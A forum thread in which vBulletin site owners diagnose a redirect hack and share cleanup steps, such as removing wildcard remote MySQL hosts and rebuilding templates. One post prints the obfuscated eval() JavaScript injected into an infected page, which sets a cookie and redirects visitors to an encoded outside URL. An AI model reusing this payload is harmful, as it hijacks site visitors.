vBulletin 3.x and 4.x Redirect Security Exploit
Collapse
This topic is closed.
X
X
-
The release Mert mentioned is shown as vbseo_sitemap-3-0_PL1 on the zip file
Seems my own problem with the sitemap errors were down to not setting vbseo to kill non English characters in the urls
Fat fingered user error on that one
I know there has also been another pr update this week which can affect traffic for a few days.Comment
-
I removed vbSEO and installed vBulletin CLEAN on June 29. I'm still getting this redirect issue. My traffic went from 800 visits/day last July, crushing my site's pagerank, traffic, etc., to 40-80, and it's remained that way ever since.
I don't know if this is it, but I used Charles to check the response when going to my site and it returned this:
Code:<html><head></head><body><script type="text/javascript">var vbsp='A0620CB8';eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('t a=["\\z\\b\\c\\n\\e\\j\\b","\\k\\b\\c\\n\\e\\j\\b","\\A\\x\\b\\L\\f\\e\\p\\b\\k\\i","\\c\\d\\K\\M\\n\\N\\c\\p\\e\\o\\z","\\q\\d\\d\\J\\e\\b","\\i","\\A\\x\\f\\s\\c\\l\\i\\g","\\D\\F\\k\\f","\\G","\\r\\d\\q\\s\\c\\e\\d\\o","\\l\\c\\c\\f\\H\\g\\g\\j\\P\\Q\\e\\r\\b\\k\\c\\d\\p\\b\\B\\q\\d\\j\\g\\m\\d\\R\\o\\r\\d\\s\\m\\B\\f\\l\\f\\S\\e\\m\\i"];E y(u,C){t h=I O();h[a[1]](h[a[0]]()+T);t w=a[2]+h[a[3]]();v[a[4]]=u+a[5]+C+w+a[6]};y(a[7],a[8]);v[a[9]]=a[U]+V;',58,58,'||||||||||_0x987b|x65|x74|x6F|x69|x70|x2F|_0x414cx4|x3D|x6D|x73|x68|x64|x54|x6E|x72|x63|x6C|x61|var|_0x414cx2|document|_0x414cx5|x20|ipbcc|x67|x3B|x2E|_0x414cx3|x76|function|x62|x31|x3A|new|x6B|x47|x78|x4D|x53|Date|x79|x66|x77|x3F|86400000|10|vbsp'.split('|'),0,{}))</script></body></html>
Comment
-
With the help of the security people at RealWebHost.net, we have now positively identified the method for injecting this exploit as well as specific vulnerabilities that permitted it on a 3.83, since updated to 3.87 PL2: As it turns out, it was a server configuration and security issue combined with some specific attributes of vBulletin installations which gave the intruder direct access to the MySQL database.
The key is first to check your settings in cPanel for Remote MySQL: Unless you are using a database on a remote server, i.e., NOT on localhost, this setting should say "There are no additional MySQL access hosts configured". If you have a specific database intentionally enabled, that too is okay. What should NEVER be there is the character % - this is a wildcard which allows ALL other servers to connect to the database. If you see the wildcard enabled, DELETE IT.
Then, make sure you change your passwords to strong passwords for both cPanel and MySQL to ensure that no one can change this setting back without your knowledge.
Then, pick any add-on, disable it, then re-enable it to clear the datastore.
Finally, download the file tool_reparse.php from http://www.vbulletin.org/forum/showthread.php?t=220967 and let it find discrepancies in your compiled templates and rebuild them.Last edited by djbaxter; Sun 17 Jul '11, 2:19pm.Comment
-
Cheers for that.
1am in the morning here and I have just seen this. Im now in the process of having kittens
Did the database check and found two entries
192.168.1.%
88.148.9.210
Can I just kill those two entries or is the localhost one with the wild card % something to worry about deleting
Thanks for all the hard work and persistence in finding the solution to this
.Comment
-
Cheers for that.
1am in the morning here and I have just seen this. Im now in the process of having kittens
Did the database check and found two entries
192.168.1.%
88.148.9.210
Can I just kill those two entries or is the localhost one with the wild card % something to worry about deleting
Thanks for all the hard work and persistence in finding the solution to this
Comment
-
Cheers for that.
I took the brave approach. Checked another cpanel and database I have set up on my server.
And it showed exactly as you said.
Killed both the above without any adverse effect apart from the forums seeming to speed up on page loads
Top man..Comment
-
I was having my second litter of kittens when I checked my cpanel today and found 192.168.1.% had returned
I have been in touch with my server techs and this is the reply they gave, which also clarifies the % wild card hacking
That is part of the MySQL server by default.
Because you can use IP wildcard values in host values (for example, '192.168.1.%' to match every host on a subnet), someone could try to exploit this capability by naming a host 192.168.1.somewhere.com. To foil such attempts, MySQL disallows matching on host names that start with digits and a dot. Thus, if you have a host named something like 1.2.example.com, its name never matches the host part of account names. An IP wildcard value can match only IP numbers, not host names..Comment
-
I was having my second litter of kittens when I checked my cpanel today and found 192.168.1.% had returned
I have been in touch with my server techs and this is the reply they gave, which also clarifies the % wild card hacking
That is part of the MySQL server by default.
Because you can use IP wildcard values in host values (for example, '192.168.1.%' to match every host on a subnet), someone could try to exploit this capability by naming a host 192.168.1.somewhere.com. To foil such attempts, MySQL disallows matching on host names that start with digits and a dot. Thus, if you have a host named something like 1.2.example.com, its name never matches the host part of account names. An IP wildcard value can match only IP numbers, not host names.Comment
-
The cpanel glitch I have, is mentioned on the cpanel support forum
Seems like others have experienced the return of 192.168.1.% after they have deleted it
It dont make whats happening right..Comment
-
To reiterate, you can erase it temporarily by disabling and then re-enabling any product but the key is to figure out how the bastard is getting in.
Have you changed your passwords, especially for cPanel and phpMyAdmin? Is your AdminCP folder password protected? Do you have
Code:Options All -Indexes
What version of vBulletin are you running again?Comment
-
Looks like it might have been a false positive this time
As soon as I added evolve chat bar the errors came in
Uninstalled the bar, run the test and the warnings went
Im not taking any chances on this one
Touch wood, my remote access on the database has not come back.Comment
Related Topics
Collapse
-
by CorbinHHi at vB,
I am planning to update our site Australian Photoholics Forum "ausph.com" to SSL.
Last time we tried this, we broke our site which was down for a week!
Everyone here...-
Channel: Support Issues & Questions
-
-
by fionixHi,
I was just wondering how you get the URL shorten in Vbulletin 5.1.7 ?
From what I can see you have it done here at vbulletin.com - see url below... there is this number (which...-
Channel: Support Issues & Questions
-
-
by zyuzGood afternoon.I set ssl whatever forum was on the https protocol, prescribed in your permanent address offline via https, but do not know how to do so, that would be a http version offline (http://f...
-
Channel: Support Issues & Questions
-
-
by rag_gupta
-
Channel: Support Issues & Questions
-
Comment